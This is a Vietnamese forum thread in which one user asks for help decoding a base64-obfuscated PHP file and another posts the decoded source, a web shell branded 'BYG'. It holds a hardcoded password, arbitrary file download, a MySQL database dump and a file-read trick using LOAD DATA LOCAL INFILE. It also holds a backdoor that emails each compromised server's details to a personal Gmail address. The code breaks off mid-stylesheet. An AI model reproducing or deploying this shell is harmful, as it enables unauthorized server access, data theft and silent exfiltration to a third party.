30/09/2018, 17:44

Close Topic - Top đã đóng, không vào!

base64, e dùng tool , k decode được, code lỗi
http://pastebin.com/RESa5Uub

d decode được rồi!

( September Boy ) viết 19:58 ngày 30/09/2018

/****************************************\

error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(’ ‘, microtime());
$starttime = $mtime[1] + $mtime[0];
define(‘SA_ROOT’, str_replace(’\’, ‘/’, dirname(FILE)).’/’);
//define(‘IS_WIN’, strstr(PHP_OS, ‘WIN’) ? 1 : 0 );
define(‘IS_WIN’, DIRECTORY_SEPARATOR == ‘\’);
define(‘IS_COM’, class_exists(‘COM’) ? 1 : 0 );
define(‘IS_GPC’, get_magic_quotes_gpc());
$dis_func = get_cfg_var(‘disable_functions’);
define(‘IS_PHPINFO’, (!eregi(“phpinfo”,$dis_func)) ? 1 : 0 );
@set_time_limit(0);

foreach(array(’_GET’,’_POST’) as $_request) {
foreach($$_request as $_key => $_value) {
if ($key{0} != '’) {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}

/================= Info Login ================/
$admin = array();
$admin[‘check’] = true;
$admin[‘pass’] = ‘byg’; // Password login
$admin[‘cookiepre’] = ‘’;
$admin[‘cookiedomain’] = ‘’;
$admin[‘cookiepath’] = ‘/’;
$admin[‘cookielife’] = 86400;
/===================== End =====================/

if ($charset == ‘utf8’) {
header(“content-Type: text/html; charset=utf-8”);
} elseif ($charset == ‘big5’) {
header(“content-Type: text/html; charset=big5”);
} elseif ($charset == ‘gbk’) {
header(“content-Type: text/html; charset=gbk”);
} elseif ($charset == ‘latin1’) {
header(“content-Type: text/html; charset=iso-8859-2”);
}

$self = $_SERVER[‘PHP_SELF’] ? $_SERVER[‘PHP_SELF’] : $_SERVER[‘SCRIPT_NAME’];
$timestamp = time();

/===================== Login =====================/
if ($action == “logout”) {
scookie(‘vbapass’, ‘’, -86400 * 365);
p(’’);
p(’’);
exit;
}
if($admin[‘check’]) {
if ($doing == ‘login’) {
if ($admin[‘pass’] == $password) {
scookie(‘vbapass’, $password);

// Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam
$time_shell = “”.date(“d/m/Y - H:i:s”)."";
$ip_remote = $_SERVER[“REMOTE_ADDR”];
$from_shellcode = ‘shell@’.gethostbyname($_SERVER[‘SERVER_NAME’]).’’;
$to_email = ‘minhduong.pjn@gmail.com’;
$server_mail = “”.gethostbyname($_SERVER[‘SERVER_NAME’])." - “.$_SERVER[‘HTTP_HOST’].”";
$linkcr = “Link: “.$_SERVER[‘SERVER_NAME’].””.$_SERVER[‘REQUEST_URI’]." - IP Excuting: $ip_remote - Time: $time_shell";
$header = “From: $from_shellcode\r\nReply-to: $from_shellcode”;
@mail($to_email, $server_mail, $linkcr, $header);
p(’’);
p(’

BYG - The Legend of Vietnamese Hacker World - Please wait…
<img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA>

’);
exit;
}

else
{
$err_mess = '<table width=100%><tr><td bgcolor=#0E0E0E width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>';

echo $err_mess;
}}
if ($_COOKIE[‘vbapass’]) {
if ($_COOKIE[‘vbapass’] != $admin[‘pass’]) {
loginpage();
}
} else {
loginpage();
}
}
/===================== Login =====================/

$errmsg = ‘’;

if ($action == ‘phpinfo’) {
if (IS_PHPINFO) {
phpinfo();
} else {
$errmsg = ‘phpinfo() function has non-permissible’;
}
}

if ($doing == ‘downfile’ && $thefile) {
if (!@file_exists($thefile)) {
$errmsg = ‘The file you want Downloadable was nonexistent’;
} else {
$fileinfo = pathinfo($thefile);
header(‘Content-type: application/x-’.$fileinfo[‘extension’]);
header(‘Content-Disposition: attachment; filename=’.$fileinfo[‘basename’]);
header('Content-Length: '.filesize($thefile));
@readfile($thefile);
exit;
}
}

if ($doing == ‘backupmysql’ && !$saveasfile) {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
$table = array_flip($table);
$result = q(“SHOW tables”);
if (!$result) p(’

’.mysql_error().’

’);
$filename = basename($_SERVER[‘HTTP_HOST’].’_MySQL.sql’);
header(‘Content-type: application/unknown’);
header(‘Content-Disposition: attachment; filename=’.$filename);
$mysqldata = ‘’;
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata .= sqldumptable($currow[0]);
}
}
mysql_close();
exit;
}

// Mysql
if($doing==‘mysqldown’){
if (!$dbname) {
$errmsg = ‘Please input dbname’;
} else {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
if (!file_exists($mysqldlfile)) {
$errmsg = ‘The file you want Downloadable was nonexistent’;
} else {
$result = q(“select load_file(’$mysqldlfile’);”);
if(!$result){
q(“DROP TABLE IF EXISTS tmp_angel;”);
q(“CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);”);
//Download SQL
q(“LOAD DATA LOCAL INFILE '”.addslashes($mysqldlfile)."’ INTO TABLE tmp_angel FIELDS TERMINATED BY ‘angel{$timestamp}eof’ ESCAPED BY ‘’ LINES TERMINATED BY ‘angel{$timestamp}eof’;");
$result = q(“select content from tmp_angel”);
q(“DROP TABLE tmp_angel”);
}
$row = @mysql_fetch_array($result);
if (!$row) {
$errmsg = 'Load file failed '.mysql_error();
} else {
$fileinfo = pathinfo($mysqldlfile);
header(‘Content-type: application/x-’.$fileinfo[‘extension’]);
header(‘Content-Disposition: attachment; filename=’.$fileinfo[‘basename’]);
header("Accept-Length: ".strlen($row[0]));
echo $row[0];
exit;
}
}
}
}

<?php echo str_replace('.','','BYG - The Legend of Vietnamese Hacker World');?> body,td{font: 10pt Tahoma;color:gray;line-height: 16px;}

a {color: #74A202;text-decoration:none;}
a:hover{color: #f00;text-decoration:underline;}
.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}
.alt2 td{bord

abcxyz viết 19:55 ngày 30/09/2018

xincamon bạn

Bình luận về bài viết này

Chia sẻ tin đăng đến bạn bè

Gửi Messenger

Bài liên quan

abcxyz

0 chủ đề

0 bài viết

Tác giả nổi bật